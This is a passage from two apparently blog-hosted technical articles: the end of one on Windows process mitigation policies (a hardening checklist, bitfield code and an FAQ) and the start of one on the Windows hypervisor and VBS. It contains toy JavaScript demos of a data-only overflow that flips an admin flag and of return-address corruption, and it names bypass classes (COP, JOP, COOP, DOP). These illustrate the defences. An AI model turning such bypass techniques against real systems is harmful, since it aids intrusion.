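// Legitimate, unmodified control flow: same branch, same callees, every time.
function handleRequest() {
  return memory[IS_ADMIN_OFFSET] !== 0 ? 'admin panel' : 'access denied';
}

const before = handleRequest();
setDisplayName(new Uint8Array(17).fill(0x41));   // 16 bytes of name + 1 byte of overflow
const after = handleRequest();

console.log(before, '->', after);   // access denied -> admin panel
```

No return address, function pointer, or vtable was touched. Every indirect-call check and every shadow-stack comparison in this program would pass.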

A second structural limit: process mitigations are per-process. The kernel has a parallel mitigation surface (kCFG, kCET, HVCI, Secure Kernel, the VBS/Trustlets stack) the per-process policies do not touch [@mcgarr-bhusa25]. The user-mode hardening recipe stops at the syscall boundary. Everything beyond is the kernel's job. A renderer that is fully hardened can still be the entry point for a kernel privilege escalation if a syscall takes attacker-controlled input and the kernel-side code path has its own bug.

The third structural limit is the most uncomfortable to state.

Key idea: Process mitigations harden the exploit chain. They do not fix the bug. The C/C++ memory-safety bug is still there; mitigations just constrain what the attacker can do with it.

Matt Miller, then a senior security engineer at the Microsoft Security Response Center, said this in his BlueHat IL 2019 talk. The deck is on GitHub at the Microsoft MSRC Security Research repository, with the load-bearing slide preserved verbatim [@miller-bhil-pdf]:

~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues. -- Matt Miller, BlueHat IL 2019 [@miller-bhil-pdf]

ZDNet's contemporaneous coverage extended the claim: "around 70 percent of all the vulnerabilities in Microsoft products addressed through a security update each year are memory safety issues; a Microsoft engineer revealed last week at a security conference; over the last 12 years, around 70 percent of all Microsoft patches were fixes for memory safety bugs" [@zdnet-70percent].

Seventy percent. For a decade. The mitigations in this article -- CFG, XFG, CET, ACG, CIG, every smaller policy in the enum -- exist precisely because that number was not going down. Each generation raises the cost of weaponizing a memory-safety bug into a working exploit. None of them reduces the rate at which memory-safety bugs are introduced into the codebase in the first place.

For the kernel-mode side -- kCFG, kCET, HVCI, and the Trustlets that execute in the Virtual Trust Level 1 (VTL1) Secure Kernel layer -- see the *VBS and Trustlets* sibling article in this series. The user-mode and kernel-mode mitigation surfaces are designed to compose: a renderer hardened to the canonical recipe in section 10, syscalling into a kernel hardened with kCFG and kCET, and protected by an HVCI hypervisor, is the layered defense Microsoft's strategic direction since 2014 has been building toward.

The only ceiling-breaker is to replace the language (so the bug never exists) or to replace the memory model (so the bug cannot be turned into a primitive). The two long-term answers are memory-safe systems languages, principally Rust (Microsoft has been publicly committing to Rust in Windows since 2019 [@msrc-rust-2019]), and hardware-enforced memory safety, such as CHERI capabilities and ARM MTE tagging, which catches the bug at the dereference rather than somewhere down the exploit chain.

Three things have to be true for mitigations to keep buying time:

Each new mitigation closes a specific attack class -- which means a specific bypass class becomes the next research front.
Each new bypass class must take an attacker longer to develop than it takes Microsoft to ship the next mitigation -- otherwise the curve goes the wrong way.
The fraction of memory-safety bugs in shipped code has to either stop rising or start falling -- otherwise no number of mitigations stacks fast enough.

Mitigations are a delaying action. The long-term answer is somewhere else. The reader's belief at this point is no longer "stack enough mitigations and we win." It is "mitigations have a structural ceiling, and the bug is still there." If process mitigations have a ceiling, what is Microsoft pivoting toward, and what is the open frontier?

14. Open problems

Six things are still unsolved -- or, more precisely, six things are partially solved in ways that are documented but visibly imperfect.

1. Forward-edge CFI without recompilation. Binary-rewriting CFI (BinCFI, Mocfi, Lockdown) is not production-grade on Windows. Microsoft's strategic answer is "recompile first-party code with /guard:cf and accept that legacy third-party binaries remain unguarded." That answer is a long-tail problem: the surface of legacy third-party DLLs that load into hardened Windows processes (drivers, COM components, accessibility tools) is large, slow to recompile, and outside Microsoft's direct control.

2. Backward-edge protection on pre-CET hardware. Microsoft's pre-CET internal experiment was Return Flow Guard (RFG), a software-implemented per-thread shadow stack maintained by the runtime rather than the CPU. Tencent Xuanwu Lab bypasses came faster than Microsoft could harden RFG [@wiki-cfi]; Microsoft pivoted to wait for Intel CET. Pre-Tiger-Lake (pre-September-2020) Intel hardware and pre-Zen-3 (pre-November-2020) AMD hardware remain unprotected on the backward edge. Enterprises that need backward-edge protection on older hardware have to sandbox in VBS-isolated VMs -- cross-link to the VBS/Trustlets sibling article.

3. The JIT-engine compatibility tax under ACG. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip. For short-lived JavaScript (lots of small functions, one-shot pages, ad-network microservices), this is significant. Chrome's V8 sandbox project (active since 2023) confines the JIT process to a sandboxed memory range of the renderer's address space, which closes the IPC-level attack class but does not erase the perf cost [@v8-sandbox-blog]. Interpreter-only renderers for low-trust contexts (small pages, ad iframes) are the medium-term direction; the cost is the runtime perf gap to fully-jitted JS.

4. ACG plus AV interoperability. Defender's MsMpEng.exe cannot enable ACG. The scanner engine generates code at runtime: signature compilation routines, emulator bytecode, regex JITs. Migration to interpreted bytecode is partial. This is a permanent compatibility tension between W^X-as-process-invariant and runtime-generated-code-as-a-feature, and it shows up in every AV engine across every vendor (CrowdStrike Falcon, SentinelOne, Symantec), not just Defender.

5. Signed-but-vulnerable Microsoft DLLs as universal CIG-bypass loaders. The Microsoft-signed DLL surface is enormous and historically full of side-effect DLLs. The App Control / WDAC blocklist is reactive. The blocklist publishes quarterly. New signed-but-vulnerable DLLs are found every quarter. This is a permanent residual risk against CIG and the structural reason vendors with sensitive workloads sometimes run with MitigationOptIn plus a per-process allowlist rather than MicrosoftSignedOnly plus an unbounded universe.

6. XFG default-on tradeoffs. XFG's instrumentation is in the MSVC binaries; the dispatch thunks are in ntdll.dll. Enforcement-by-default never shipped. McGarr's BHUSA 2025 deck names XFG as "deprecated" [@mcgarr-bhusa25]; Microsoft's strategic direction is hardware-backed CFI (CET shadow stack for the backward edge) plus kCFG / kCET in the kernel. The unsolved question is whether the forward edge can ever get fine-grained protection without the compatibility cost that killed XFG. Apple's PAC suggests yes (because the cryptographic key approach imposes no compatibility cost on function-pointer casts); LLVM's -fsanitize=cfi-icall suggests yes for code built end-to-end with LTO. Neither has a Windows analog as of 2026.

Recompile first-party code with `/guard:cf /CETCOMPAT`. Push the kernel hardening (kCFG, kCET, HVCI) forward, since the user-mode surface is mature. Lean on hardware (Intel CET, AMD shadow stack, eventually MTE-on-Windows-on-ARM) rather than software heuristics. Accept that legacy unrecompiled binaries remain unguarded and quarantine them in lower-trust VBS-isolated contexts. That is the strategy McGarr's 2025 deck implies and that the Defender / Edge / Recall configurations in the section 10 matrix execute [@mcgarr-bhusa25].

Six open problems. The first four are engineering. The last two are structural. The structural ones suggest the next-decade answer is not a better mitigation, but a different memory model: Rust, CHERI, MTE.

15. Practical guide: ten steps to ship a hardened binary

Concrete. Ten steps. By the end of this checklist, your new sandboxed-parser binary is hardened to the canonical 2026 recipe.

1. Run dumpbin /headers /loadconfig YourBinary.exe. Verify the Guard Flags word is non-zero, that FID Table present is in the output, and that the Guard CF Function Table is non-empty [@ms-cfg-doc].
2. Compile and link with: /guard:cf /guard:cfw /CETCOMPAT /DYNAMICBASE /HIGHENTROPYVA /NXCOMPAT. The /CETCOMPAT flag requires Visual Studio 2019 or later and x64 only [@ms-guard-cf-compiler, @ms-guard-cf-linker, @ms-cetcompat].
3. Call SetProcessMitigationPolicy (or, better, UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) for child processes) for: ProcessDynamicCodePolicy, ProcessExtensionPointDisablePolicy, ProcessImageLoadPolicy (with NoRemoteImages plus NoLowMandatoryLabelImages plus PreferSystem32Images), ProcessStrictHandleCheckPolicy, ProcessSystemCallDisablePolicy (if your process does not draw windows), and ProcessUserShadowStackPolicy (with EnableUserShadowStack and, for the most-hardened sandboxes, BlockNonCetBinaries) [@ms-setprocessmitigationpolicy, @ms-dynamic-code-policy, @ms-image-load-policy, @ms-user-shadow-stack-policy].
4. Use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) rather than post-CreateProcess policy installation for any child process. This is the single most important step on this list.
5. Audit with Set-ProcessMitigation -PolicyFilePath (Group Policy / Intune deployable XML). The schema and the cmdlet are documented in the Defender Exploit Protection reference [@ms-defender-exploit-protection].
6. For sandboxed parsers (PDF, image, video, font), enable ProcessFontDisablePolicy. Refuse non-system fonts at the per-process layer.
7. For signed-component-only processes, enable ProcessSignaturePolicy(MicrosoftSignedOnly). Accept that some third-party DLLs will not load and document each gap in your threat model [@ms-binary-signature-policy].
8. For browser-class sandboxed children, prohibit child-process creation with ProcessChildProcessPolicy. Closes the renderer-to-cmd.exe pivot class.
9. Validate the rendered policy at runtime with Get-ProcessMitigation -Name <binary>. Spot-check that every flag you set in code is reflected in the cmdlet output [@ms-defender-exploit-protection].
10. For each policy you cannot enable, document the structural reason in your threat model. A binary that misses CIG because it depends on third-party COM add-ins is making a deliberate threat-model choice; that choice must be visible to the security review.

Note: UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) closes the race-the-mitigation-window class structurally (section 8, section 12). Every other step on this list is a useful addition. Step 4 is the load-bearing step that lets every other step work as designed. Without it, a peer process in the same security context can disable any of the others between CreateProcess and the child's first attempt to install its policies.

The composition of the policy bitfield itself is mechanical. Each policy is a small DWORD-sized structure in the SetProcessMitigationPolicy API; the mitigation-policy attribute for UpdateProcThreadAttribute instead packs the creation-time flags into a 64-bit MitigationOptions value, optionally followed by a second 64-bit value that carries the PROCESS_CREATION_MITIGATION_POLICY2_* flags.

Run this in an elevated PowerShell session, replacing `msedge.exe` with the basename of your binary:

Get-ProcessMitigation -Name msedge.exe |
  Format-List CFG, CETShadowStack, BinarySignature, DynamicCode,
              ExtensionPoint, ImageLoad, StrictHandle, SystemCall,
              ChildProcess, FontDisable, PayloadRestriction,
              SideChannelIsolation, ASLR, DEP

Each block in the output shows Enable, Audit, and the subordinate flag word with its individual boolean fields. Spot-check that every flag your code sets in SetProcessMitigationPolicy is reflected as ON in the cmdlet output, and that any OFF or NOTSET cell has a documented structural reason in your threat model [@ms-defender-exploit-protection].

// Each name is documented in the PROCESS_CREATION_MITIGATION_POLICY_* constants
// in winnt.h. The bit positions below follow the Microsoft Learn reference.
const POL = {
  // Low 32 bits: legacy mitigations
  'DEP_ENABLE':                             0x01n << 0n,
  'DEP_ATL_THUNK_ENABLE':                   0x01n << 1n,
  'SEHOP_ENABLE':                           0x01n << 2n,
  'FORCE_RELOCATE_IMAGES_ALWAYS_ON':        0x01n << 8n,
  'HEAP_TERMINATE_ALWAYS_ON':               0x01n << 12n,
  'BOTTOM_UP_ASLR_ALWAYS_ON':               0x01n << 16n,
  'HIGH_ENTROPY_ASLR_ALWAYS_ON':            0x01n << 20n,
  'STRICT_HANDLE_CHECKS_ALWAYS_ON':         0x01n << 24n,
  'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON':   0x01n << 28n,
  // High 32 bits: modern mitigations
  'EXTENSION_POINT_DISABLE_ALWAYS_ON':      0x01n << 32n,
  'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON':        0x01n << 36n,
  'CONTROL_FLOW_GUARD_ALWAYS_ON':           0x01n << 40n,
  'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON': 0x01n << 44n,
  'FONT_DISABLE_ALWAYS_ON':                 0x01n << 48n,
  'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON':         0x01n << 52n,
};

// Compose the recipe for a sandboxed PDF parser
const enabled = [
  'DEP_ENABLE',
  'BOTTOM_UP_ASLR_ALWAYS_ON',
  'HIGH_ENTROPY_ASLR_ALWAYS_ON',
  'STRICT_HANDLE_CHECKS_ALWAYS_ON',
  'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON',
  'EXTENSION_POINT_DISABLE_ALWAYS_ON',
  'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON',
  'CONTROL_FLOW_GUARD_ALWAYS_ON',
  'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON',
  'FONT_DISABLE_ALWAYS_ON',
  'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON',
];

// OR the selected flags into one 64-bit value
let options = 0n;
for (const name of enabled) options |= POL[name];
console.log('MitigationOptions = 0x' + options.toString(16).padStart(16, '0'));
console.log('Policies enabled: ' + enabled.length + ' of ' + Object.keys(POL).length);
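Going the other way, from a raw value back to named states, is just as mechanical. The sketch below is a hedged illustration: the helper name `decodeMitigationOptions` and the `LEGACY_FIELDS` table are hypothetical, and only four legacy fields are listed for brevity. It assumes the winnt.h layout in which each of these policies occupies a two-bit field, with 0 meaning defer, 1 always-on, and 2 always-off; verify the positions against your SDK headers before relying on them.

```javascript
// Field start bits for a few legacy policies (subset, for illustration only).
const LEGACY_FIELDS = {
  FORCE_RELOCATE_IMAGES: 8n,
  HEAP_TERMINATE: 12n,
  BOTTOM_UP_ASLR: 16n,
  HIGH_ENTROPY_ASLR: 20n,
};

// Value 3 is reserved for most policies and policy-specific for a few.
const STATE = ['DEFER', 'ALWAYS_ON', 'ALWAYS_OFF', 'RESERVED_OR_POLICY_SPECIFIC'];

// Read the two-bit state out of each named field.
function decodeMitigationOptions(options, fields) {
  const out = {};
  for (const [name, shift] of Object.entries(fields)) {
    out[name] = STATE[Number((options >> shift) & 0x3n)];
  }
  return out;
}

const sample = (1n << 8n) | (1n << 16n) | (2n << 20n);
console.log(decodeMitigationOptions(sample, LEGACY_FIELDS));
```

A decoder like this is useful in a unit test that asserts the value you pass at process creation still says what the threat model says it should.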

Stack the recipe. Document the gaps. Watch the FAQ below for the common misconceptions you will hit on the way.

16. Frequently asked questions

On x64 Windows, DEP is unconditionally on for all processes. `ProcessDEPPolicy` in `SetProcessMitigationPolicy` is a 32-bit-only vestigial knob, retained because some 32-bit legacy code is still in production [@ms-setprocessmitigationpolicy]. For new code on x64, you do not need to touch the DEP policy; the only useful per-process refinement is `ProcessASLRPolicy` (specifically `ForceRelocateImages` and `HighEntropy`), to insist on high-entropy randomization even when third-party DLLs were built without `/DYNAMICBASE`.

No. They attack different surfaces. CIG (`ProcessSignaturePolicy`) prohibits *loading unsigned images*. ACG (`ProcessDynamicCodePolicy`) prohibits *generating new executable code at runtime*. An attacker who finds a signed-but-vulnerable DLL bypasses CIG but does not bypass ACG. An attacker who finds a JIT-spray primitive in an in-process JIT bypasses ACG but does not bypass CIG (because they are not loading a new DLL). The two are orthogonal, and a hardened process needs both [@miller-acg-blog, @ms-binary-signature-policy, @ms-dynamic-code-policy].

No. The MSVC `/guard:xfg` flag exists. The `__guard_xfg_dispatch_icall_fptr` thunk exists in `ntdll.dll`. The instrumentation is in some binaries. Enforcement-by-default never shipped, and Connor McGarr's Black Hat USA 2025 deck describes XFG as "deprecated" [@mcgarr-bhusa25]. Microsoft's strategic direction is hardware-backed CET shadow stack for the backward edge plus kCFG and kCET in the kernel; fine-grained forward-edge protection on Windows in 2026 means LLVM's `-fsanitize=cfi-icall` on opted-in builds, not XFG.

Only the return-edge variant. CET shadow stack catches any attempt to corrupt a return address on the regular stack and then return through it [@cet-techcommunity-wayback]. *Call-oriented programming* (COP, chains of `call`-terminated gadgets) and *jump-oriented programming* (JOP, chains of `jmp`-terminated gadgets) preserve the call/return invariant -- the gadgets do not return through corrupted stack frames -- so CET sees nothing. COOP (section 5) chains entire legitimate virtual function calls with matching call/return pairs; CET also sees nothing [@coop-ieeesecurity-pdf]. CET stops *classical* ROP. It does not stop code-reuse exploitation in general.

Because ACG, enabled in Edge in Windows 10 1703 (March 2017), made in-process JIT a `STATUS_DYNAMIC_CODE_BLOCKED` error [@miller-acg-blog]. The Chakra JIT (then later V8 when Edge moved to Chromium) was rearchitected to run in a separate JIT process that compiles JavaScript and ships the compiled code back to the renderer via an authenticated IPC channel plus a signed-section mapping. The renderer maps the signed section read-execute via `MapViewOfFile`; nothing in the renderer ever calls `VirtualAlloc(PAGE_EXECUTE_*)`. Section 8 walks the architecture in detail.

They constrain the exploit chain but do not fix the root-cause bug. Data-oriented attacks (DOP, section 13) are Turing-complete and survive every CFI variant because no control flow is ever hijacked [@dop-paper]. Signed-but-vulnerable DLLs survive CIG. ACG plus CIG closes the *code* dimension on a hardened process, but a sufficiently-determined attacker who finds a write-what-where primitive can still build a data-only exploit chain in any nontrivial program. The long-term answer is memory-safe languages; Microsoft has been publicly committing to Rust in Windows since 2019, and Matt Miller's BlueHat IL 2019 talk gave the structural justification: "~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues" [@miller-bhil-pdf]. The short-term answer is the recipe in section 15: stack the mitigations, document the gaps, and treat memory-safety as the limit you are working against.
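The shadow-stack answer above can be made concrete with a toy model. This sketch is an illustration, not CET: the two arrays, the `call` and `ret` helpers, and the addresses are hypothetical stand-ins for the regular stack, the hardware-protected shadow stack, and the CPU's comparison on return.

```javascript
// The regular stack is attacker-writable; the shadow stack is written
// only by call and read only by ret.
const stack = [];
const shadowStack = [];

function call(returnAddress) {
  stack.push(returnAddress);
  shadowStack.push(returnAddress);
}

function ret() {
  const fromStack = stack.pop();
  const fromShadow = shadowStack.pop();
  if (fromStack !== fromShadow) throw new Error('control protection fault (#CP)');
  return fromStack;
}

// Classical ROP: overwrite the saved return address, then return through it.
call(0x401000);
stack[stack.length - 1] = 0xdeadbeef;
try {
  ret();
} catch (e) {
  console.log(e.message);                    // control protection fault (#CP)
}

// Forward-edge hijack: a corrupted function pointer, but every call still
// has a matching, uncorrupted return.
const dispatch = { handler: () => 'legitimate' };
dispatch.handler = () => 'attacker-chosen function';
call(0x402000);
const result = dispatch.handler();
console.log(result, ret() === 0x402000);     // attacker-chosen function true
```

The second case is the COP/JOP/COOP situation in miniature: the return-address comparison passes, so the shadow stack has nothing to object to.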

The bug is still there. The exploit is just much harder. The article ends where it began: a renderer process that survived an info-leak-plus-write-what-where chain because six per-process mitigations all held at once. That is what Windows process mitigation policies do.

Above Ring Zero: How the Windows Hypervisor Became a Security Primitive

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**The Windows hypervisor is the program that loaded before Windows did.** It runs at a privilege level the Windows kernel cannot reach and owns the page tables that decide which memory the Windows kernel may even see. Virtualization-Based Security, Credential Guard, HVCI (Memory Integrity in Windows Security), Application Control, VBS Enclaves, and System Guard Secure Launch are all built by composing five primitives the hypervisor exposes -- partitions, hypercalls, intercepts, SynIC, and per-VTL SLAT. The substrate is real, alive, and producing two to four public CVEs per year; the residual attack surface (firmware below, side channels above, IOMMU bypass beside, hypervisor rollback) is where Windows security still earns its hardest miles.

1. Above Ring Zero

On a Windows 11 machine with VBS turned on, a kernel-mode driver running with full Ring-0 privilege cannot read a single byte of the LSASS process's credential cache. It cannot load an unsigned driver. It cannot patch ntoskrnl.exe. It cannot disable HVCI without a reboot. None of this is enforced by Windows. It is enforced by a different program -- one that loaded before Windows did, that runs at a privilege level the Windows kernel cannot reach, and that owns the page tables that say which memory the Windows kernel may even see. That program is the Windows hypervisor [@ms-hyperv-architecture, @ms-tlfs-vsm].

The intuition this fact violates is older than most readers' careers. "SYSTEM owns the box." Every introductory security course teaches it. Local administrator escalates to SYSTEM, SYSTEM loads a driver, the driver runs in the kernel, and the kernel can do anything to the machine. That model is correct for a Windows installation running without Virtualization-Based Security. It is wrong, in three specific and load-bearing ways, for a Windows installation that has VBS turned on.

Virtualization-Based Security (VBS): a Windows security architecture that uses the Hyper-V hypervisor to create a small, isolated execution environment alongside the normal Windows operating system. The hypervisor allocates a portion of memory, configures its second-level page tables to make that memory unreadable and unwritable from normal kernel mode, and runs Microsoft-signed code there -- the Secure Kernel and isolated user-mode trustlets -- that the regular NT kernel cannot reach. Credential Guard, HVCI, Application Control, and System Guard all sit on top of this primitive [@ms-tlfs-vsm].
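The "unreadable and unwritable from normal kernel mode" property comes from checking every access twice. The toy model below is a sketch under heavy simplification: the page numbers, permission strings, and the `access` helper are hypothetical, and a real system gives each trust level its own guest page tables as well. What it preserves is the ordering of authority: the guest kernel owns the first table, the hypervisor owns the second, and both must agree.

```javascript
// Stage 1: guest page tables, owned by the NT kernel (a Ring-0 attacker can rewrite these).
const guestPageTable = new Map([[0x100, 'rwx'], [0x200, 'rw-']]);

// Stage 2: per-VTL second-level tables, owned by the hypervisor.
const slat = {
  VTL0: new Map([[0x100, 'r-x'], [0x200, '---']]),   // page 0x200 holds secrets
  VTL1: new Map([[0x100, 'r-x'], [0x200, 'rw-']]),
};

function access(vtl, page, kind) {           // kind is 'r', 'w', or 'x'
  const guest = guestPageTable.get(page) ?? '---';
  const host = slat[vtl].get(page) ?? '---';
  // Both stages must grant the access; the guest cannot widen what stage 2 allows.
  if (!guest.includes(kind)) throw new Error('guest page fault');
  if (!host.includes(kind)) throw new Error('SLAT violation: intercepted by hypervisor');
  return true;
}

const denied = (fn) => { try { fn(); return false; } catch { return true; } };

console.log(denied(() => access('VTL0', 0x200, 'r')));   // true: secrets invisible to the normal kernel
console.log(denied(() => access('VTL1', 0x200, 'r')));   // false: the secure world can read them
console.log(denied(() => access('VTL0', 0x100, 'w')));   // true: code page stays read-execute
```

The third line is the HVCI-shaped case: the guest table says the code page is writable, and the write still fails because the table the kernel does not own says otherwise.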

The binary in question is named hvix64.exe on Intel hosts and hvax64.exe on AMD hosts. It is loaded by hvloader.efi before winload.exe ever runs. By the time the Windows boot manager hands control to the NT kernel, the hypervisor has already configured the CPU's virtualization extensions, allocated its own private memory, taken ownership of the IOMMU, and set up the per-partition second-level page tables that decide which physical pages each partition can see [@ms-tlfs-pdf]. From the NT kernel's point of view, the machine starts up already inside a guest partition. There is no escape upward.

Note: Loose security writing sometimes calls the hypervisor's privilege level "Ring -1." That phrase is colloquial. Intel's manuals say "VMX root operation"; AMD's manuals say "SVM host mode." Both terms denote a CPU operating mode that sits architecturally outside the four-ring privilege stack the guest OS sees, not a fifth ring inside it.

This article is about the program that loaded first. The siblings in this series -- on the Secure Kernel, on Credential Guard and NTLMless, on Secure Boot, and on Adminless -- all assume what this article explains. Each of them describes a policy: the Secure Kernel enforces code integrity; Credential Guard isolates LSASS; Adminless raises the bar on local administrator. None of those policies would be enforceable without a piece of software running at a privilege level the policy's adversary cannot reach. The hypervisor is that piece of software, and "security primitive" is how Microsoft, the security research community, and the bug-bounty market all describe its current role.

By the end of this article you will know five things. First, why the hypervisor became a security primitive -- the architectural failure of Ring-0 defenses that Microsoft fought for a decade and finally gave up on in 2015. Second, how it became one, in three steps: Popek and Goldberg's 1974 virtualizability theorem; Intel VT-x and AMD-V in 2005-2006; and David Hepkin and Arun Kishan's 2013 patent on hierarchical Virtual Trust Levels [@us9430642b2-patent]. Third, what it enforces, feature by feature, with the hypervisor primitive that backs each: HVCI rides on per-VTL SLAT; Credential Guard rides on SynIC plus the secure-call ABI; System Guard Secure Launch rides on DRTM [@ms-system-guard-secure-launch]. Fourth, where it has actually failed in public -- six worked CVEs across three distinct attack classes, all narrowly localized. Fifth, what is structurally outside its mandate: firmware below the hypervisor, microarchitectural side channels above it, IOMMU bypass beside it, and hypervisor rollback through the update pipeline.

The story is half engineering and half conceptual inversion. How did a server-consolidation hypervisor that shipped in 2008 with Windows Server 2008 -- a product whose original marketing pitch was "run more VMs per box" -- become the architectural substrate that protects every load-bearing Windows security boundary in 2026? The answer begins in 1974, with a paper that defined what a hypervisor even is. But the political and engineering thread begins five years before Hyper-V shipped, in San Mateo, California.

2. Origins -- Connectix to Viridian to Hyper-V

Microsoft entered the virtualization market three years late and by acquisition. On February 19, 2003, the company bought Connectix, a small San Mateo software house founded in 1988 that had built Virtual PC for Macintosh and, later, Virtual PC for Windows. The Connectix engineers became the nucleus of what Microsoft would internally call the Windows Server Virtualization team. The acquired products shipped as Microsoft Virtual PC 2004 and Microsoft Virtual Server 2005. Both were Type-2 hypervisors -- user-mode applications that ran on top of Windows, using software techniques rather than CPU virtualization extensions, because the CPU virtualization extensions did not yet exist on shipping x86 hardware.

Type-1 hypervisor: A hypervisor that runs directly on hardware rather than as an application on top of a host operating system. The hypervisor owns the CPU, the second-level page tables, and (in the security-relevant case) the IOMMU; guest operating systems run at a lower privilege level, in partitions or virtual machines that the hypervisor schedules and isolates. IBM's CP-67/CMS in 1968 is the genre's origin; VMware ESX, Xen, and the Microsoft hypervisor (`hvix64.exe`/`hvax64.exe`) are the modern examples [@wp-hypervisor].

In 2005, the team began a new project under the codename "Viridian." The goal was a Type-1 micro-kernelized hypervisor for x86-64 -- a fresh build, not a derivative of Virtual Server -- that required hardware virtualization extensions at install time. Intel's VT-x had shipped in November 2005 with the Pentium 4 662/672; AMD-V had shipped on May 23, 2006 with the Socket AM2 platform, initially available across Athlon 64 X2 and Athlon 64 FX and select Athlon 64 models. Both were now broadly enough deployed that Microsoft could make hardware virtualization a system requirement rather than a configuration option. Three years later, on June 26, 2008 (Wikipedia's body text gives this date; the infobox states June 28), Hyper-V reached RTM and was delivered as a Windows Server 2008 feature through Windows Update [@wp-hyperv].

Note: Microsoft ships two hypervisor binaries: hvix64.exe for Intel hosts (using VT-x) and hvax64.exe for AMD hosts (using AMD-V). The instruction-set-architecture divergence is real -- Intel uses vmcall to enter the hypervisor; AMD uses vmmcall -- but the hypercall ABI surface above that single instruction is identical, so the rest of the Microsoft hypervisor codebase is shared between the two binaries.

The 2008 design choices are worth naming individually because the ones that mattered for server consolidation turned out, seven years later, to also be the ones that mattered for security. Three deserve flagging:

Micro-kernelized architecture. The hypervisor binary contains only the minimum machinery needed to virtualize the CPU, schedule VMs, and enforce memory isolation. It does not contain device drivers. It does not contain a network stack. It does not contain a filesystem.
Root partition plus child partitions. From the Microsoft architecture documentation: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install; the child partitions are guest VMs.
VMBus, VSP, and VSC. Inter-partition I/O happens over the VMBus -- a paravirtualized message channel. A Virtualization Service Provider (VSP) runs in the root partition and owns the real device; a Virtualization Service Client (VSC) runs in each child partition and talks to the VSP over VMBus. Device emulation lives in the root partition's user-mode and kernel-mode code, not in the hypervisor binary itself. This is the choice that, seven years later, kept the hypervisor's Trusted Computing Base small enough to be defensible.

flowchart TD
    subgraph Root["Root partition (Windows Server)"]
        RD["Real device drivers"]
        VSP["Virtualization Service Providers"]
        VMM["VM Worker Processes (vmwp.exe)"]
    end
    subgraph Child1["Child partition 1 (guest OS)"]
        VSC1["Virtualization Service Clients"]
        Guest1["Guest kernel + apps"]
    end
    subgraph Child2["Child partition 2 (guest OS)"]
        VSC2["Virtualization Service Clients"]
        Guest2["Guest kernel + apps"]
    end
    HV["Microsoft Hypervisor (hvix64.exe / hvax64.exe)"]
    HW["Hardware (CPU, RAM, NIC, disk)"]
    Root -. VMBus .- Child1
    Root -. VMBus .- Child2
    Root --> HV
    Child1 --> HV
    Child2 --> HV
    HV --> HW

The micro-kernel, root-plus-child, and VMBus choices were defensible server engineering. The rationale was that emulating a NIC, a SCSI controller, or a graphics adapter inside the hypervisor binary would balloon the binary's size, tie its code-review cycles to those of every device the company shipped, and force the same security-critical code that scheduled CPUs to also parse Ethernet frames. Putting device emulation in a normal Windows process inside the root partition -- the VM Worker Process vmwp.exe -- meant the hypervisor binary could stay small enough to reason about.

The 2008 design goal was, again, server consolidation. Microsoft's positioning materials at the time named "run more VMs per box, get better hardware use" as the customer pitch. Nothing in the 2008 Hyper-V documentation describes the hypervisor as a security primitive for the host OS. The security re-purposing -- the moment Hyper-V's hardware-privilege isolation became the way Windows itself protected its own kernel from itself -- did not arrive until 2015. To understand why it arrived at all, we have to back up thirty-four years to a 1974 paper that defined what virtualization formally requires.

3. The Theoretical Anchor -- Popek, Goldberg, and SLAT

Before Microsoft could build a hypervisor that ran security-critical code at a higher privilege than the Windows kernel, two unrelated decisions had to land. One was made in 1974, by two researchers who would never see Windows. The other was made in 2005, by Intel.

In July 1974, Gerald Popek of UCLA and Robert Goldberg of Harvard published "Formal Requirements for Virtualizable Third Generation Architectures" in Communications of the ACM. The paper laid down three properties any "true" virtual machine monitor must satisfy:

Equivalence. Programs run on the VMM exhibit behavior essentially identical to behavior on the bare machine, except for differences due to timing and resource availability.
Resource control. The VMM, not the guest, controls the system resources -- CPU time slices, memory, devices.
Efficiency. A statistically dominant subset of the instruction stream executes directly on hardware, without VMM intervention.

The theorem that gave the paper its lasting reputation followed from those properties. Let a sensitive instruction be one that either reads or modifies privileged state (the processor's mode bits, page-table base register, interrupt mask). Let a privileged instruction be one that traps when executed in user mode. Then a sufficient condition for an ISA to be virtualizable is that every sensitive instruction is privileged. The intuition is simple: the VMM must get a chance to see -- and to handle -- every guest action that touches the machine's privileged state. If the CPU silently lets the guest do something privileged-feeling without trapping, the VMM cannot maintain equivalence and control simultaneously.

Popek-Goldberg virtualizability: A property of a processor architecture: every sensitive instruction in the instruction set is privileged. An architecture with this property can be virtualized "classically" -- with a thin trap-and-emulate hypervisor whose only entry points are the traps the CPU raises on privileged-instruction violations. An architecture without this property requires software workarounds (binary translation, paravirtualization) or hardware extensions (VT-x, AMD-V) before a Popek-Goldberg-style VMM can be built.

For three decades, x86 was famously not virtualizable in the Popek-Goldberg sense. John Robin and Cynthia Irvine enumerated the problem in their 2000 USENIX Security paper: seventeen protected-mode instructions on the IA-32 architecture either read or modified privileged state without trapping from user mode. VMware Workstation, released in 1999 by VMware Inc. (which had been founded the year prior by Mendel Rosenblum, Diane Greene, Scott Devine, Ellen Wang, and Edouard Bugnion), worked around the problem with binary translation: it dynamically rewrote each protected-mode guest instruction stream to substitute or trap the seventeen offenders. The technique imposed double-digit overhead, made debugging miserable, and was a security liability in its own right -- the binary translator itself was a parser of arbitrary attacker-controlled code.

